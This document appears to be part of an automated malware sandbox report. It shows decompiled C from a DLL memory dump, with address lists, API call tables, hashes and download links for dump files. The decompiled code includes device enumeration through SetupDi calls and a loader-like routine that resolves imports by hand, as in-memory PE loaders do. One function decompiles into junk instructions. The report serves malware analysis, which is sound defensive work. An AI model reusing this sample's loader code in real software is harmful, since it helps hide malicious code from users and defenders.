                                                                                                                                                                  0x10019aef
                                                                                                                                                                  0x10019af4
                                                                                                                                                                  0x10019af4
                                                                                                                                                                  0x10019afc
                                                                                                                                                                  0x10019afd
                                                                                                                                                                  0x10019b02
                                                                                                                                                                  0x10019b05
                                                                                                                                                                  0x10019b07
                                                                                                                                                                  0x10019b1b
                                                                                                                                                                  0x10019b26
                                                                                                                                                                  0x10019b27
                                                                                                                                                                  0x10019b2c
                                                                                                                                                                  0x10019b2c
                                                                                                                                                                  0x10019b35
                                                                                                                                                                  0x10019b39
                                                                                                                                                                  0x10019b3a
                                                                                                                                                                  0x10019b3c
                                                                                                                                                                  0x10019b44
                                                                                                                                                                  0x10019b49
                                                                                                                                                                  0x10019b49
                                                                                                                                                                  0x10019b51
                                                                                                                                                                  0x10019b52
                                                                                                                                                                  0x10019b57
                                                                                                                                                                  0x10019b5a
                                                                                                                                                                  0x10019b5c
                                                                                                                                                                  0x10019b70
                                                                                                                                                                  0x10019b7b
                                                                                                                                                                  0x10019b7c
                                                                                                                                                                  0x10019b81
                                                                                                                                                                  0x10019b81
                                                                                                                                                                  0x10019b8a
                                                                                                                                                                  0x10019b8e
                                                                                                                                                                  0x10019b8f
                                                                                                                                                                  0x10019b91
                                                                                                                                                                  0x10019b99
                                                                                                                                                                  0x10019b9e
                                                                                                                                                                  0x10019b9e
                                                                                                                                                                  0x10019ba6
                                                                                                                                                                  0x10019ba7
                                                                                                                                                                  0x10019bac
                                                                                                                                                                  0x10019baf
                                                                                                                                                                  0x10019bb1
                                                                                                                                                                  0x10019bc5
                                                                                                                                                                  0x10019bd0
                                                                                                                                                                  0x10019bd1
                                                                                                                                                                  0x10019bd6
                                                                                                                                                                  0x10019bd6
                                                                                                                                                                  0x10019bdf
                                                                                                                                                                  0x10019be3
                                                                                                                                                                  0x10019be4
                                                                                                                                                                  0x10019be6
                                                                                                                                                                  0x10019bee
                                                                                                                                                                  0x10019bf3
                                                                                                                                                                  0x10019bf3
                                                                                                                                                                  0x10019bfb
                                                                                                                                                                  0x10019bfc
                                                                                                                                                                  0x10019c01
                                                                                                                                                                  0x10019c04
                                                                                                                                                                  0x10019c06
                                                                                                                                                                  0x10019c1a
                                                                                                                                                                  0x10019c25
                                                                                                                                                                  0x10019c26
                                                                                                                                                                  0x10019c2b
                                                                                                                                                                  0x10019c2b
                                                                                                                                                                  0x10019c37
                                                                                                                                                                  0x10019c4a
                                                                                                                                                                  0x10019c4a
                                                                                                                                                                  0x10019c5b
                                                                                                                                                                  0x10019c5b
                                                                                                                                                                  0x10019c6b
                                                                                                                                                                  0x10019c76
                                                                                                                                                                  0x10019c76
                                                                                                                                                                  0x10019c79
                                                                                                                                                                  0x10019c7f
                                                                                                                                                                  0x10019c8c
                                                                                                                                                                  0x10019c97
                                                                                                                                                                  0x10019ca3

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 10019A1F
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A40
                                                                                                                                                                  • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A61
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A7D
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                    • Part of subcall function 100197E0: GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                    • Part of subcall function 100197E0: _memset.LIBCMT ref: 1001983E
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019C5B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3323326763-0
                                                                                                                                                                  • Opcode ID: f8c89a6727fd7a968aa7c8f84d6bdcaed2ad53855714dbc5a262361878d3537d
                                                                                                                                                                  • Instruction ID: feca0670d641fe6b0cb65ea07884cbe10e98eaee29bba7d3bd3bbacfe8845874
                                                                                                                                                                  • Opcode Fuzzy Hash: f8c89a6727fd7a968aa7c8f84d6bdcaed2ad53855714dbc5a262361878d3537d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C81A5B6D006189BDB14DBA8DC51FEF7378EB48315F048198E509B7281EB35AA85CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001ABC0, Relevance: 7.7, APIs: 5, Instructions: 180COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1001ABC0(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E078(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}




























                                                                                                                                                                  0x1001abc9
                                                                                                                                                                  0x1001abcc
                                                                                                                                                                  0x1001abcf
                                                                                                                                                                  0x1001abe0
                                                                                                                                                                  0x1001abea
                                                                                                                                                                  0x1001abfe
                                                                                                                                                                  0x1001ac0c
                                                                                                                                                                  0x1001ac12
                                                                                                                                                                  0x1001ac18
                                                                                                                                                                  0x1001ac1a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac20
                                                                                                                                                                  0x1001ac23
                                                                                                                                                                  0x1001ac27
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac30
                                                                                                                                                                  0x1001ac41
                                                                                                                                                                  0x1001ac44
                                                                                                                                                                  0x1001ac46
                                                                                                                                                                  0x1001ac49
                                                                                                                                                                  0x1001ac4c
                                                                                                                                                                  0x1001ac50
                                                                                                                                                                  0x1001ac69
                                                                                                                                                                  0x1001ac73
                                                                                                                                                                  0x1001ac77
                                                                                                                                                                  0x1001ac7a
                                                                                                                                                                  0x1001ac7b
                                                                                                                                                                  0x1001ac80
                                                                                                                                                                  0x1001ac83
                                                                                                                                                                  0x1001ac86
                                                                                                                                                                  0x1001ac8a
                                                                                                                                                                  0x1001acbc
                                                                                                                                                                  0x1001acc2
                                                                                                                                                                  0x1001acc8
                                                                                                                                                                  0x1001acce
                                                                                                                                                                  0x1001acd4
                                                                                                                                                                  0x1001acdd
                                                                                                                                                                  0x1001ace3
                                                                                                                                                                  0x1001ace6
                                                                                                                                                                  0x1001ad0a
                                                                                                                                                                  0x1001ad13
                                                                                                                                                                  0x1001ad13
                                                                                                                                                                  0x1001ad16
                                                                                                                                                                  0x1001ace8
                                                                                                                                                                  0x1001acf0
                                                                                                                                                                  0x1001acfc
                                                                                                                                                                  0x1001acfc
                                                                                                                                                                  0x1001ad2d
                                                                                                                                                                  0x1001ad30
                                                                                                                                                                  0x1001ad33
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad3a
                                                                                                                                                                  0x1001ad40
                                                                                                                                                                  0x1001ad72
                                                                                                                                                                  0x1001ad78
                                                                                                                                                                  0x1001ad7f
                                                                                                                                                                  0x1001ad7f
                                                                                                                                                                  0x1001ad8a
                                                                                                                                                                  0x1001ad8d
                                                                                                                                                                  0x1001ad8f
                                                                                                                                                                  0x1001ad95
                                                                                                                                                                  0x1001ad42
                                                                                                                                                                  0x1001ad45
                                                                                                                                                                  0x1001ad5b
                                                                                                                                                                  0x1001ad5e
                                                                                                                                                                  0x1001ad60
                                                                                                                                                                  0x1001ad66
                                                                                                                                                                  0x1001ad66
                                                                                                                                                                  0x1001ad9a
                                                                                                                                                                  0x1001ad9d
                                                                                                                                                                  0x1001ad21
                                                                                                                                                                  0x1001ad27
                                                                                                                                                                  0x1001ad27
                                                                                                                                                                  0x1001ad2a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ad9f
                                                                                                                                                                  0x1001ad9d
                                                                                                                                                                  0x1001adad
                                                                                                                                                                  0x1001adb1
                                                                                                                                                                  0x1001ac06
                                                                                                                                                                  0x1001ac06
                                                                                                                                                                  0x1001ac09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac09
                                                                                                                                                                  0x1001adb6
                                                                                                                                                                  0x1001adc1
                                                                                                                                                                  0x1001adc4
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001adcb
                                                                                                                                                                  0x1001ac8f
                                                                                                                                                                  0x1001ac9a
                                                                                                                                                                  0x1001ac9d
                                                                                                                                                                  0x1001aca4
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001acaa
                                                                                                                                                                  0x1001ac54
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ac5a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001add8
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
                                                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 1001AC54
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                                                  • Opcode ID: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction ID: 7fa1d4eba7a4407511cddb994e7de49554f5151831751da13495a7fdaa87bcf2
                                                                                                                                                                  • Opcode Fuzzy Hash: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B81A374A00209EFDB04CF94D981AAEB7F1FF89355F248158E919AB351C735EA82CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000C9F5, Relevance: 6.1, APIs: 4, Instructions: 76memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 23%
                                                                                                                                                                  			E1000C9F5(signed char __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi) {
				signed char _t12;
				intOrPtr* _t20;
				intOrPtr _t23;
				signed char _t37;
				intOrPtr _t40;
				signed int _t42;

				_t36 = __edx;
				_t11 = __eax;
				do {
					 *_t11 =  *_t11 + _t36;
					asm("rol dh, 1");
					 *_t11 =  *_t11 + _t36;
					_t12 = _t11 ^ 0x000000ba;
					 *_t12 =  *_t12 + _t36;
					asm("adc al, 0xbe");
					 *_t12 =  *_t12 + _t36;
					_t37 = _t36 & _t12;
					 *_t12 =  *_t12 + _t37;
					 *_t12 = 0x10;
					asm("movsd");
					 *_t12 =  *_t12 + _t37;
					asm("rol dword [eax], 0x10");
					_t36 = 0xc5;
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					_push(ss);
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					 *0xFFFFFFFF7A7B2000 =  *((intOrPtr*)(0xffffffff7a7b2000)) + 0xc5;
					 *(0xffffffff7a7b2000 & _t42) =  *(0xffffffff7a7b2000 & _t42) + 0xc5;
					_t11 = 0xbc671000;
					 *0xbc671000 =  *0xbc671000 + 0xc5;
				} while ( *0xbc671000 >= 0);
				 *0xbc671000 =  *0xbc671000 + 0xc5;
				asm("les eax, [eax]");
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103314d0);
				_t18 = E10010594(0xbc671000, __edi, 0xc2af1000);
				_t40 =  *((intOrPtr*)(_t42 + 8));
				if(_t40 != 0) {
					if( *0x10337f3c != 3) {
						_push(_t40);
						goto L10;
					} else {
						L1000FA63(4);
						 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
						_t23 = E1000FADC(_t40);
						 *((intOrPtr*)(_t42 - 0x1c)) = _t23;
						if(_t23 != 0) {
							_push(_t40);
							_push(_t23);
							E1000FB07();
						}
						 *(_t42 - 4) = 0xfffffffe;
						_t18 = E1000CA96();
						if( *((intOrPtr*)(_t42 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t42 + 8)));
							L10:
							_push(0);
							_t18 = RtlFreeHeap( *0x10335310); // executed
							_t48 = _t18;
							if(_t18 == 0) {
								_t20 = E1000F780(_t48);
								 *_t20 = E1000F745(GetLastError());
							}
						}
					}
				}
				return E100105D9(_t18);
			}









                                                                                                                                                                  0x1000c9f5
                                                                                                                                                                  0x1000c9f5
                                                                                                                                                                  0x1000c9fa
                                                                                                                                                                  0x1000c9fa
                                                                                                                                                                  0x1000c9fc
                                                                                                                                                                  0x1000c9fe
                                                                                                                                                                  0x1000ca00
                                                                                                                                                                  0x1000ca02
                                                                                                                                                                  0x1000ca04
                                                                                                                                                                  0x1000ca06
                                                                                                                                                                  0x1000ca08
                                                                                                                                                                  0x1000ca0a
                                                                                                                                                                  0x1000ca0d
                                                                                                                                                                  0x1000ca10
                                                                                                                                                                  0x1000ca16
                                                                                                                                                                  0x1000ca19
                                                                                                                                                                  0x1000ca1c
                                                                                                                                                                  0x1000ca1e
                                                                                                                                                                  0x1000ca20
                                                                                                                                                                  0x1000ca26
                                                                                                                                                                  0x1000ca2a
                                                                                                                                                                  0x1000ca2e
                                                                                                                                                                  0x1000ca31
                                                                                                                                                                  0x1000ca36
                                                                                                                                                                  0x1000ca36
                                                                                                                                                                  0x1000ca3a
                                                                                                                                                                  0x1000ca3d
                                                                                                                                                                  0x1000ca3f
                                                                                                                                                                  0x1000ca40
                                                                                                                                                                  0x1000ca42
                                                                                                                                                                  0x1000ca47
                                                                                                                                                                  0x1000ca4c
                                                                                                                                                                  0x1000ca51
                                                                                                                                                                  0x1000ca5a
                                                                                                                                                                  0x1000ca9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ca5c
                                                                                                                                                                  0x1000ca5e
                                                                                                                                                                  0x1000ca64
                                                                                                                                                                  0x1000ca69
                                                                                                                                                                  0x1000ca6f
                                                                                                                                                                  0x1000ca74
                                                                                                                                                                  0x1000ca76
                                                                                                                                                                  0x1000ca77
                                                                                                                                                                  0x1000ca78
                                                                                                                                                                  0x1000ca7e
                                                                                                                                                                  0x1000ca7f
                                                                                                                                                                  0x1000ca86
                                                                                                                                                                  0x1000ca8f
                                                                                                                                                                  0x1000ca91
                                                                                                                                                                  0x1000caa0
                                                                                                                                                                  0x1000caa0
                                                                                                                                                                  0x1000caa8
                                                                                                                                                                  0x1000caae
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000cab2
                                                                                                                                                                  0x1000cac5
                                                                                                                                                                  0x1000cac7
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000ca8f
                                                                                                                                                                  0x1000ca5a
                                                                                                                                                                  0x1000cacd

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction ID: 7764d91bb7ab2f2a00e23681c00b78d4a37f2ec3e5ecfdf2bc9b2b987e4ed42f
                                                                                                                                                                  • Opcode Fuzzy Hash: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction Fuzzy Hash: FA21F17AA0D3895FEB03CB704C85A893F60DF072D5F0A00DAE0449B1E7DA748C09CB52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100197E0, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E100197E0(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CEAF(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF80(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
					_v8 = 1;
				}
				return _v8;
			}






                                                                                                                                                                  0x100197e6
                                                                                                                                                                  0x100197ed
                                                                                                                                                                  0x1001980c
                                                                                                                                                                  0x1001981b
                                                                                                                                                                  0x1001982e
                                                                                                                                                                  0x1001983e
                                                                                                                                                                  0x10019864
                                                                                                                                                                  0x1001986a
                                                                                                                                                                  0x1001986a
                                                                                                                                                                  0x10019877

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                  • _memset.LIBCMT ref: 1001983E
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 895502402-0
                                                                                                                                                                  • Opcode ID: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction ID: 24f19bb5529a22c6d1e928f7077b1b8c164a3afe4c2a2c0ecea0b5371702a92b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction Fuzzy Hash: EA11C6B9610208ABDB04CF94C8D5FDA77B9AB48304F118259F9099B280DA31EA85CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000CA40, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                                                  			E1000CA40(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103314d0);
				_t8 = E10010594(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E100105D9(_t8);
				}
				if( *0x10337f3c != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10335310); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F780(_t31);
						 *_t10 = E1000F745(GetLastError());
					}
					goto L9;
				}
				L1000FA63(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FADC(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FB07();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA96();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                                                  0x1000ca40
                                                                                                                                                                  0x1000ca42
                                                                                                                                                                  0x1000ca47
                                                                                                                                                                  0x1000ca4c
                                                                                                                                                                  0x1000ca51
                                                                                                                                                                  0x1000cac8
                                                                                                                                                                  0x1000cacd
                                                                                                                                                                  0x1000cacd
                                                                                                                                                                  0x1000ca5a
                                                                                                                                                                  0x1000ca9f
                                                                                                                                                                  0x1000caa0
                                                                                                                                                                  0x1000caa0
                                                                                                                                                                  0x1000caa8
                                                                                                                                                                  0x1000caae
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000cab2
                                                                                                                                                                  0x1000cac5
                                                                                                                                                                  0x1000cac7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000ca5e
                                                                                                                                                                  0x1000ca64
                                                                                                                                                                  0x1000ca69
                                                                                                                                                                  0x1000ca6f
                                                                                                                                                                  0x1000ca74
                                                                                                                                                                  0x1000ca76
                                                                                                                                                                  0x1000ca77
                                                                                                                                                                  0x1000ca78
                                                                                                                                                                  0x1000ca7e
                                                                                                                                                                  0x1000ca7f
                                                                                                                                                                  0x1000ca86
                                                                                                                                                                  0x1000ca8f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ca91
                                                                                                                                                                  0x1000ca91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ca91

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
